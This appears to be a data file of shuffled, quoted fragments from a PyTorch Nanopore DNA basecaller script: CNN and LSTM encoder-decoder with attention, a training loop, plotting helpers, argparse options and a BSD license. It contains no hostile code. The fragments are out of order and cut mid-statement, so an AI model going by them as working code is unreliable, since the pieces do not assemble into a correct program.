"the LSTM layer if self.bidirectional: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim*2, self.hidden_dim*2, self.num_layers, batch_first=True,",
"disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this",
"F.tanh(cellgate) outgate = F.sigmoid(outgate) cy = (forgetgate * c) + (ingate * cellgate)",
"0 print(\"=\" * 30) print(\"epoch {}/{}\".format(epoch+1, n_epochs)) print(\"=\" * 30) total_train_loss = 0",
"(a, b), where a and b both have shape (num_layers, batch_size, hidden_dim). #",
"i) for epoch in p.keys(): if epoch % print_epoch == 0 or epoch",
"hidden) # [batch size, seq, hidden dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq,",
"len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch)) plt.xlabel(\"Time",
"# create your dataloader return(train_loader) def convert_to_string(pred, target, target_lengths): import editdistance vocab =",
"dim), target = (seq*batch) # Target nicht one-hot encoden reshaped_output = output.view(-1, output.size(2))",
"elements loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train += loss.item() acc",
"np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) valid_loss = running_loss_val / float(iteration_val +",
"dict_training_loss = {} dict_validation_loss = {} dict_training_acc = {} dict_validation_acc = {} dict_training_editd",
"else: if self.attention: self.lstm_unroll = nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll",
"3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates",
"batch_y10 = data[4] #Wrap them in a Variable object inputs, labels, labels10 =",
"batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir, port=port, attention=attention, dropout=dropout) model12 = Seq2Seq(cnn_encoder",
"and \"linear\" not in name: print(name,param.data.size()) n = param.size(0) # forget gate start,",
"dropout=0): super(LSTMencoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers",
"features # rest: seq, true_batch_size:max_seq_len, features filled with 0 outputs[i, 0:input_decoder.size(0), :] =",
"= nn.LSTM(self.input_dim+self.hidden_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers,",
"y = y[not_padded_batches, :, :] # batch-i, features, seq len encoder_outputs = encoder_outputs[not_padded_batches,",
"top1 = input_decoder.argmax(1) # get argmax of prediction #if teacher forcing, use actual",
"matrix_param = dict_weights[u] for idx_p, p in enumerate(y_len): if len(matrix_param[p].shape) > 2: #",
"unpacked[original_idx, :, :] return hidden_original, unpacked_original # The Decoder # ----------- class LSTMCellDecoder(nn.Module):",
"hidden[0][:, not_padded_batches, :] c = hidden[1][:, not_padded_batches, :] hidden = (h, c) label",
"= nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True) def init_hidden(self): # This is what we'll initialise",
"batch_norm=batch_normalization, dropout = dropout_on, dropout_p = dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels =",
"input_decoder = F.log_softmax(lstm_in_unroll, dim=1) # (batch_size*seq, out_dim) --> (batch_size, out_dim) #decide if we",
"create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your",
"2021 (<EMAIL>) All rights reserved. Redistribution and use in source and binary forms,",
"editd_val = input[1], input[3], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2,",
"self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias = bias self.i2h = nn.Linear(input_size,",
"num_layers = args.lstm_layers bidir = args.bi_lstm attention = args.attention dropout = args.dropout #",
"true seq length if i >= true_y_len[-1].item() and len(true_y_len) > 1: not_padded_batches =",
"if validation: ax.plot(list(acc_val.keys()), [v*100 for v in list(acc_val.values())], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in",
"class LSTMCellEncoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True): super(LSTMCellEncoder, self).__init__() self.input_size = input_size self.hidden_size",
"bidirectional = False, port=1, attention=True, dropout=0): super(LSTMdecoder, self).__init__() self.input_dim = input_dim self.hidden_dim =",
"pickle import random import time import matplotlib.pyplot as plt import matplotlib.ticker as ticker",
"ed_val, num_char_ref = convert_to_string(output_val.argmax(2), sorted_labels_val, sorted_labels_len_val) epoch_editd_val += ed_val running_editd_val += ed_val val_editd.append(ed_val)",
"FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER",
"model # ----------- class Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder): super().__init__() self.cnn_encoder =",
"# script directory file_out = script_dir + \"/\" + infile print(file_out) with open(file_out,",
"hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder = False, bidirectional=False, port=1, dropout=0): super(LSTMencoder, self).__init__() self.input_dim",
"trainable parameters') f = open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \" \\n\") f.write(\"Training:",
"pdf, editD=editD) plot_error_accuarcy_iterations_val(out12[0], pdf, editD=editD) print(\"Training took: {:0>2}:{:0>2}:{:05.2f}\".format(int(hours),int(minutes),seconds)) if __name__ == '__main__': sys.exit(basecalling(sys.argv))",
"= 25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False): #Print all of the hyperparameters of",
"fig.add_subplot(2, 2, i) for epoch in p.keys(): if epoch % print_epoch == 0",
"and (updates % make_validation == 0): # or (updates == n_epochs-1)): if reduced_TF:",
"sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val != 5 # indices of not padded elements loss_val",
"hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx, :, :] return hidden_original, unpacked_original #",
"trainings set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_train.values()))))), np.concatenate(np.array(list(editd_train.values()))), label=\"training",
"actual next token as next input #if not, use predicted token onehot =",
"= time.time() out12 = trainNet( model12, train_ds = train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds",
"dim] max_in_batch = int(max(true_y_len.cpu())) start_seq = True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port) # SOS",
"n_epochs-1)): if reduced_TF: #if updates > int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio >= 0.5:",
"for w in self.parameters(): w.data.uniform_(-std, std) def forward(self, x, hidden): h, c =",
"pooling=pooling_type, layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on, dropout_p = dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn)",
"= get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10, batch_size=batch_size, shuffle=True) if val_ds != None: val_loader",
"\" \\n\") f.write(\"Training: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length:",
"input for LSTM batch_size x seq_length x input_size #### LSTM if (seq_len_cnn <=",
"of not padded elements loss_val = criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val",
"labels10, labels.size(1), mode) output = torch.transpose(output, 0, 1).contiguous() # input for LSTM seq_length",
"= args.gpu_port SEED = args.set_seed batch = args.batch_size epochs = args.epochs make_validation =",
"< true_y_len # get indices of not padded sequences true_y_len = true_y_len[not_padded_batches] #",
"# input_decoder: b,hidden; attn_applied: b, 1, hidden input = torch.unsqueeze(input_decoder.type(torch.FloatTensor), 1).cuda(self.port) # (batch,",
"h2 = torch.cat([hidden2[0:hidden2.size(0):2], hidden2[1:hidden2.size(0):2]], 2) hidden = (h1, h2) batch_size = true_y_len.size(0) max_for",
"None: input_x_val = val_ds[0] input_y_val = val_ds[1] input_y10_val = val_ds[2] signal_len_val = val_ds[3]",
"ax.plot(list(acc_train.keys()), [v*100 for v in list(acc_train.values())], label=\"training accuracy\") if validation: ax.plot(list(acc_val.keys()), [v*100 for",
"== reshaped_sorted_labels_val[notpadded_index_val] ).sum().item() / reshaped_sorted_labels_val[notpadded_index_val].size(0) epoch_acc_val += acc_val running_acc_val += acc_val val_acc.append(acc_val) if",
"from validation set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_val.values()))))), [v*100 for v",
"= LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional = bidir, port=port,",
"plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs. updates from trainings set\") if pdf",
"ratio. Default=1, TF on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float, default=0.001, help=\"Weight",
"self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False, dropout=self.dropout) else: self.lstm_unroll = nn.LSTM(self.input_dim, self.hidden_dim*2, self.num_layers, batch_first=True, bidirectional=False,",
"# encoder batch first: b,len,hidden, hidden: 2,b,hidden attn_applied = torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port))",
"figure = svm.get_figure() figure.savefig(save_files_path + \"/heatmap_{}.pdf\".format(filename)) plt.clf() if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]),",
"2: # and matrix_param[p].shape[1] == 1: # (256, 1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0],",
"self.lstm = nn.LSTM(self.input_dim, self.hidden_dim, self.num_layers, batch_first=True, bidirectional=self.bidirectional, dropout=self.dropout) # self.lstm_p = nn.LSTM(self.input_dim, self.hidden_dim,",
"cer, updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] =",
"batch_x_val = data_val[0] batch_y_val = data_val[1] seq_len_val = data_val[2] lab_len_val = data_val[3] batch_y10_val",
"other <= self.end def make_argparser(): parser = argparse.ArgumentParser(description='Nanopore Basecaller') parser.add_argument('-i', '--input', required =",
"##### Decoder ############################# ########################################### #### LSTM random_value = random.random() out_decoder, decoder_hidden = self.lstm_decoder(",
"\"bias\" in name: if forget_bias != \"None\" and \"lstm_encoder\" in name: print(name,param.data.size()) n",
"pdf=None, editD=True): sns.set(font_scale=1) loss_train, acc_train, editd_train = input[0], input[2], input[4] fig = plt.figure(figsize=(18,2))",
"in name and \"linear\" not in name: print(name,param.data.size()) n = param.size(0) # forget",
"ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE",
"the early_stopping object early_stopping = EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in =",
"import torch.optim as optim from torch.utils.data import Dataset, DataLoader from sklearn.preprocessing import LabelEncoder",
"stopping\") break if reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] = acc_iteration",
"= [] for iteration, data in enumerate(train_loader): model.train() #Set the parameter gradients to",
"and early_stopping.early_stop: # break epoch loop print(\"Early stopping\") break model.train() epoch_loss = 0",
"model12, train_ds = train_set, optimizer=optimizer, criterion=criterion, clipping_value=clipping_value, val_ds = val_set, batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher,",
"num_chars += len(encoded_target) return editd, num_chars def trainNet(model, train_ds, optimizer, criterion, clipping_value=None, val_ds=None,",
"trainNet(model, train_ds, optimizer, criterion, clipping_value=None, val_ds=None, test_ds=None, batch_size=256, n_epochs=500, teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\",",
"and decoder must be equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and decoder must",
"ticks at regular intervals if epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch),",
"'min') #Loop for n_epochs for epoch in range(n_epochs): if earlyStopping and early_stopping.early_stop: #",
"idx_b = 0 matrix_param = dict_weights[u] for idx_p, p in enumerate(y_len): if len(matrix_param[p].shape)",
"in max_for: # Stop looping if we got to the last element in",
"if split_LSTMbiases: y_len_biases = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[3]]), x.split(\".\")[2]]) for x in y_len_biases] df_b =",
"labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False), Variable(batch_y10_val, requires_grad=False) # batch_size x out_size x",
"shape of lstm_in: [batch, seq_len, input_dim] # shape of lstm_out: [batch, seq_len, output_dim]",
"= data_val[3] batch_y10_val = data_val[4] inputs_val, labels_val, labels10_val = Variable(batch_x_val, requires_grad=False), Variable(batch_y_val, requires_grad=False),",
"if editD: f.write(\"best performances on trainings set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit",
"Edit Distance\") plt.legend() plt.title(\"Edit distance vs. updates from validation set\") if pdf is",
"in range(n_epochs): if earlyStopping and early_stopping.early_stop: # break epoch loop print(\"Early stopping\") break",
"acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def basecalling(argv): parser",
"args.kernel cnn_out = args.channel_number #256 pooling_type = args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers batch_normalization",
"sorted_idx_target = lab_len.sort(0, descending=True) sorted_hiddens1 = encoder_hidden[0][:, sorted_idx_target, :] sorted_hiddens2 = encoder_hidden[1][:, sorted_idx_target,",
"0.0 running_acc_train = 0.0 running_acc_val = 0.0 running_editd_train = 0.0 running_editd_val = 0.0",
"negative_idx = seq_len_cnn > 0 seq_len_cnn = seq_len_cnn[negative_idx] in_lstm = in_lstm[negative_idx, : ,",
"the packing operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out, batch_first=True) # targets oder batch sortieren",
"val_acc if editD: dict_validation_editd[epoch] = val_editd # early_stopping needs the validation loss to",
"right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))), np.concatenate(np.array(list(loss_train.values()))),",
"= {} dict_training_loss2 = {} dict_validation_loss2 = {} dict_training_acc2 = {} dict_validation_acc2 =",
"LabelEncoder from sklearn.preprocessing import OneHotEncoder from torch.utils.tensorboard import SummaryWriter import itertools import seaborn",
"encoder_outputs[not_padded_batches, :, :] else: label = y[:, :, i] # batch, features, seq",
"ord=2) idx_b += 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for x in y_len]",
"gate start, end = n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias)))",
"self.batch_size = batch_size self.num_layers = num_layers self.output_dim = output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional",
".format(epochs, batch, earlyStopping, patience_earlyStop, weight_decay, clipping_value, lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget",
"outputs = torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max. target length, batch size, hidden dim]",
"sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :, :] # sort labels so that they match",
"cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc)",
"forget gate start, end = n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate",
"length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe model has {:,} trainable",
"sns.set(font_scale=1) loss_train, loss_val, acc_train, acc_val, editd_train, editd_val = input[0], input[1], input[2], input[3], input[4],",
"n_epochs)) print(\"=\" * 30) total_train_loss = 0 loss_iteration = [] acc_iteration = []",
"#Set the parameter gradients to zero optimizer.zero_grad() batch_x = data[0] batch_y = data[1]",
"length: {}\\n\".format(train_set[0].size(), train_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(train_set[1].size(), train_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation:",
"Sequence to sequence model # ----------- class Seq2Seq(nn.Module): def __init__(self, cnn_encoder, lstm_encoder, lstm_decoder):",
"optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion",
"cellgate, outgate param.data[start:end].fill_(0.) print(start, end) # cellgate, outgate start, end = n//2, n",
"train_loader = get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10, batch_size=batch_size, shuffle=True) if val_ds != None:",
"def reset_parameters(self): std = 1.0 / math.sqrt(self.hidden_size) for w in self.parameters(): w.data.uniform_(-std, std)",
"in_lstm = in_lstm[negative_idx, : , :] # [batch, seq_len, input_dim] lab_len = lab_len[negative_idx]",
"if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder and decoder optimizer.step() if",
"true_y_len, y_class, random_value, mode_type, beam_width=1): # Forward pass through LSTM layer # shape",
"-1)) else: m = matrix_param[p] input[idx_p, idx] = np.linalg.norm(m, ord=2) if split_LSTMbiases and",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0), help=\"Dropout probability Encoder-LSTM\") parser.add_argument('-u',",
"ax = fig.add_subplot(1, 3, 3) ax.plot(list(editd_train.keys()), list(editd_train.values()), label=\"training edit distance\") if validation: ax.plot(list(editd_val.keys()),",
"h5py import numpy as np import os import sys import torch import torch.nn",
"= np.mean(val_acc) else: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train', np.mean(acc_iteration), updates) writer.add_scalar('Accuracy/validation',",
"= editd_iteration writer.close() if earlyStopping: checkpoint = torch.load(file_name) model.load_state_dict(checkpoint[\"model\"]) return ([[dict_training_loss, dict_validation_loss, dict_training_acc,",
"input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1,",
":] return hidden_original, unpacked_original # The Decoder # ----------- class LSTMCellDecoder(nn.Module): def __init__(self,",
"dim] lstm_in_unroll = self.linear(lstm_in_unroll.view(-1, lstm_in_unroll.size(2))) # (batch_size*seq, out_dim) input_decoder = F.log_softmax(lstm_in_unroll, dim=1) #",
"length if i >= true_y_len[-1].item() and len(true_y_len) > 1: not_padded_batches = i <",
"if self.bidirectional: if self.attention: # attention self.attn = nn.Linear(self.hidden_dim * 4, 1) #self.attn",
"print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss / float(iteration + 1))) print(\"acc= {0:.4f} %\".format((epoch_acc /",
"for p in seq: if p == 4: break encoded_pred.append(vocab[int(p.item())]) encoded_pred = ''.join(encoded_pred)",
"'rb') as handle: read_data = pickle.load(handle) save_files_path = script_dir + '/training_result_{}/'.format(fname) writer =",
"{:.6f}%...\".format((epoch_acc_val / float(iteration_val + 1)) * 100)) print(\"=\" * 100) dict_validation_loss[epoch] = val_losses",
"w.data.uniform_(-std, std) def forward(self, x, hidden): h, c = hidden h = h.view(h.size(0),",
"3: \"T\", 4: \"<EOF>\", 5: \"<PAD>\"} # A=0, C=1, G=2, T=3, EOF=4 script_dir",
"must be equal!\" assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and decoder must have equal",
"/ total_num_chars if updates == 0: writer.add_scalar('Loss/train', np.mean(loss_iteration), updates) writer.add_scalar('Loss/validation', np.mean(val_losses), updates) writer.add_scalar('Accuracy/train',",
": , :] # [batch, seq_len, input_dim] lab_len = lab_len[negative_idx] labels = labels[negative_idx,",
"# remove smallest element = last one #print(true_y_len, true_y_len.size()) input_decoder = input_decoder[not_padded_batches, :]",
"self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)), dim=1) # encoder batch first: b,len,hidden, hidden: 2,b,hidden",
"train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(), val_set[3].size(), val_set[4].size(), val_set[5].size()) # [batch size] is",
"updates from validation set\") if editD: ax = fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))),",
"plt.title(\"{} {}\".format(label, title)) if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path,",
"df = pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure",
"running_editd_train #/ float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates]",
"plt.title(\"Edit distance vs. updates from validation set\") if pdf is not None: pdf.savefig(fig,",
"torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def convert_to_string(pred, target,",
"figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname, editD=True): loss_train, loss_val, acc_train, acc_val, editd_train,",
"set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val],",
"IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY",
"layers in Encoder-LSTM\") parser.add_argument('--forget_bias_encoder', type=str, default=\"0\", help=\"Set forget gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder',",
"= val_editd # early_stopping needs the validation loss to check if it has",
"use actual next token as next input #if not, use predicted token onehot",
"seq_len, teacher_forcing_ratio, labels, lab_len, labels10, labels.size(1), mode) output = torch.transpose(output, 0, 1).contiguous() #",
"plt.title(\"Error vs. updates from trainings set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0, len(np.concatenate(np.array(list(acc_train.values()))))),",
"= input[1], input[3], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2)",
"if val_ds != None: val_loader = get_train_loader_trainVal(input_x_val, signal_len_val, input_y_val, label_len_val, input_y10_val, batch_size=batch_size, shuffle=True)",
"(batch, 1, feature) cy = torch.unsqueeze(cy, 0).cuda(self.port) # (batch, 1, feature) return hy,",
"= torch.bmm(attn_weights.type(torch.FloatTensor).unsqueeze(1).cuda(self.port), encoder_outputs[:, i, :].type(torch.FloatTensor).unsqueeze(1).cuda(self.port)) input_decoder = torch.cat((input_decoder, attn_applied.squeeze(1)), dim=1) # input_decoder: b,hidden;",
"########################################### ##### Encoder ############################# ########################################### #### CNN #Forward pass, backward pass, optimize in_lstm,",
"enumerate(x_len): idx_b = 0 matrix_param = dict_weights[u] for idx_p, p in enumerate(y_len): if",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--patience', type=int, default=25, help=\"Patience in early stopping\") parser.add_argument(\"--call\", type=lambda",
"= running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] =",
"100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration + 1)), \"Accuarcy: {:.6f}...\".format((epoch_acc /",
"0.0 print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration + 1)),",
"sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :, :] # batch, out_size, seq_len ########################################### ##### Decoder",
"'--input', required = True, help=\"File path to the pickle input file.\") parser.add_argument('-o', '--output',",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) # teacher forcing parser.add_argument(\"--reduced_tf\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False)",
"retain the above copyright notice, this list of conditions and the following disclaimer.",
"x, hidden): h, c = hidden h = h.view(h.size(0), -1) c = c.view(c.size(0),",
"i] # batch, features, seq len if self.attention: # ATTENTION MECHANISM attn_weights =",
"= data[1] seq_len = data[2] lab_len = data[3] batch_y10 = data[4] #Wrap them",
"to use teacher forcing or not teacher_force = random.random() < teacher_forcing_ratio # put",
"# create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0, pin_memory=False, shuffle=shuffle) # create",
"e.g. [batch size] = 32 is a good default value CNN = SimpleCNN(input_channel=1,",
"x seq_length output_val, sorted_labels_val, sorted_labels_len_val = model(inputs_val, seq_len_val, 0, labels_val, lab_len_val, labels10_val, labels_val.size(1),",
"F.sigmoid(forgetgate) cellgate = F.tanh(cellgate) outgate = F.sigmoid(outgate) cy = (forgetgate * c) +",
"import torch.nn as nn from torch.autograd import Variable import torch.nn.functional as F import",
"OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT",
"epoch % print_epoch == 0 or epoch == max(p.keys()): x = np.arange(0, len(p[epoch].detach().numpy()))",
"= np.linalg.norm(m[start: end], ord=2) idx_b += 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]), x.split(\".\")[2]]) for",
"batch size, hidden dim] max_in_batch = int(max(true_y_len.cpu())) start_seq = True input_decoder = torch.zeros(batch_size,",
"dropout=dropout) lstm_dec = LSTMdecoder(input_dim=out_classes, hidden_dim = hidden, batch_size=batch, output_dim=out_classes, num_layers=num_layers, own_cell_decoder=False, bidirectional =",
"gate bias encoder={}, forget gate bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() # with 10",
"args.attention dropout = args.dropout # CNN input_bias_cnn = args.input_bias_cnn strides = args.strides kernel",
"= 0.0 print(\"=\" * 100) print(\"Epoch: {}/{}...\".format(epoch+1, n_epochs), \"Loss: {:.6f}...\".format(epoch_loss / float(iteration +",
"def basecalling(argv): parser = make_argparser() args = parser.parse_args(argv[1:]) infile = args.input fname =",
"f.write(\"{}\\n\\n\".format(train_set[5])) f.write(\"Validation: \\nSignal:\\n\") f.write(\"{}\\ttrue signal length: {}\\n\".format(val_set[0].size(), val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(),",
"\"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOF>\", 5: \"<PAD>\"} # A=0,",
"= model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer = optim.SGD(model12.parameters(), lr=lr, momentum=0) else: optimizer",
"reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val != 5 #",
"in np.concatenate(np.array(list(acc_train.values())))], label=\"training accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from",
"\"\"\" BSD 2-Clause License Copyright (c) 2021 (<EMAIL>) All rights reserved. Redistribution and",
"default value CNN = SimpleCNN(input_channel=1, output_channel=[cnn_out,cnn_out, cnn_out] , kernel_size=kernel, stride=strides, padding=[0,0,0], pooling=pooling_type, layers=n_layers_cnn,",
"outgate start, end = n//2, n # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.)",
"float(iteration + 1))) print(\"acc= {0:.4f} %\".format((epoch_acc / float(iteration + 1)) * 100)) if",
"own_cell_decoder self.bidirectional = bidirectional self.port=port self.attention = attention self.dropout = dropout # Define",
"= original_idx.view(1, -1, 1).expand_as(hidden[0]) unsorted_hiddens1 = hidden[0][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) unsorted_hiddens2 = hidden[1][:,",
